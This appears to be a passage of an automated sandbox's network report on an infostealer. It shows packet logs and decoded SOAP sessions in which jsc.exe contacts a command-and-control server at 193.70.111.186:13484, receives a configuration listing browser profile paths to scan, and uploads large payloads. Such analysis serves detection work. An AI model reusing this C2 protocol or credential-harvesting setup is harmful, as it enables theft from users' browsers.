                                                                                      Nov 13, 2024 15:02:38.059956074 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.059967995 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060049057 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060060978 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060072899 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060136080 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060148001 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060159922 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060173035 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060184956 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060198069 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060209990 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060233116 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060245037 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060256958 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060269117 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060336113 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060348988 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060359955 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060456991 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060475111 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060487032 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060498953 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060511112 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060523033 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060534954 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060723066 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060734987 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060746908 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060760975 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060772896 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060785055 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060796022 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060820103 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060832024 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060844898 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060947895 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.060981035 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061055899 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061069012 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061096907 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061110020 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061120987 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061249971 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061263084 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061275005 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061286926 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061297894 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061378956 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061392069 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061403036 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061414957 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061480045 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061492920 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061505079 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061517954 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061599016 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061611891 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061624050 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061636925 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061729908 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061743021 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061764956 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061777115 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061788082 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061851978 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061909914 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061923027 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061939955 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061953068 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.061975956 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062028885 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062041044 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062098980 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062113047 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062124968 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062136889 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062149048 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062163115 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062174082 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062186003 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062191963 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062196970 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062207937 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062228918 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062241077 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062333107 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062345028 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062405109 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062417984 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062505007 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062516928 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062527895 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062714100 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062726974 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062738895 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062752008 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062764883 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062777996 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062788963 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062959909 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062972069 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062984943 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.062998056 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063011885 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063024044 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063035965 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063047886 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063060045 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063121080 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063133955 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063146114 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063158035 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063186884 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063199043 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063210964 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063222885 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063240051 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063410997 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063424110 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063436985 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063448906 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063462019 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063474894 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063496113 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063508034 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063961029 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063972950 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063987017 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.063998938 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064011097 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064023018 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064295053 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064306974 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064351082 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064363003 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064374924 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064387083 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064399004 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064656019 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064668894 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064680099 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064692974 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064704895 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064717054 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064728975 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064740896 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064752102 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064764977 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064775944 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064788103 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064800024 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064811945 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064836025 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064847946 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064858913 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064871073 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064882994 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064894915 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064907074 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064918041 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064930916 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064944983 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064958096 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064970016 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064981937 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.064994097 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065006018 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065016985 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065028906 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065042019 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065054893 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065068007 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065079927 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065092087 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065104961 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065128088 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065140963 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065152884 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065165043 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065176964 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065188885 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065201044 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065212965 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065226078 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065237999 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.065249920 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:38.106367111 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:39.262367010 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:39.262727976 CET1348449744193.70.111.186192.168.2.7
                                                                                      Nov 13, 2024 15:02:39.262976885 CET4974413484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:39.280394077 CET4973113484192.168.2.7193.70.111.186
                                                                                      Nov 13, 2024 15:02:39.280533075 CET4974413484192.168.2.7193.70.111.186
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 13, 2024 15:02:33.103903055 CET5317753192.168.2.71.1.1.1
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 13, 2024 15:02:33.103903055 CET192.168.2.71.1.1.10x4d38Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 13, 2024 15:02:33.111828089 CET1.1.1.1192.168.2.70x4d38No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                      • 193.70.111.186:13484
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.749699193.70.111.186134846936C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 15:02:26.732788086 CET241OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                      Host: 193.70.111.186:13484
                                                                                      Content-Length: 137
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 13, 2024 15:02:27.662338972 CET359INHTTP/1.1 200 OK
                                                                                      Content-Length: 212
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 13 Nov 2024 14:02:27 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                      Nov 13, 2024 15:02:32.733220100 CET224OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                      Host: 193.70.111.186:13484
                                                                                      Content-Length: 144
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 13, 2024 15:02:33.019684076 CET1236INHTTP/1.1 200 OK
                                                                                      Content-Length: 4744
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 13 Nov 2024 14:02:32 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.749731193.70.111.186134846936C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 15:02:35.795759916 CET222OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                      Host: 193.70.111.186:13484
                                                                                      Content-Length: 954608
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Nov 13, 2024 15:02:37.437443018 CET294INHTTP/1.1 200 OK
                                                                                      Content-Length: 147
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 13 Nov 2024 14:02:37 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.749744193.70.111.186134846936C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 15:02:37.445574999 CET242OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 193.70.111.186:13484
                                                                                      Content-Length: 954600
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      Nov 13, 2024 15:02:39.262367010 CET408INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 13 Nov 2024 14:02:38 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                      Nov 13, 2024 15:02:39.262727976 CET408INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 13 Nov 2024 14:02:38 GMT
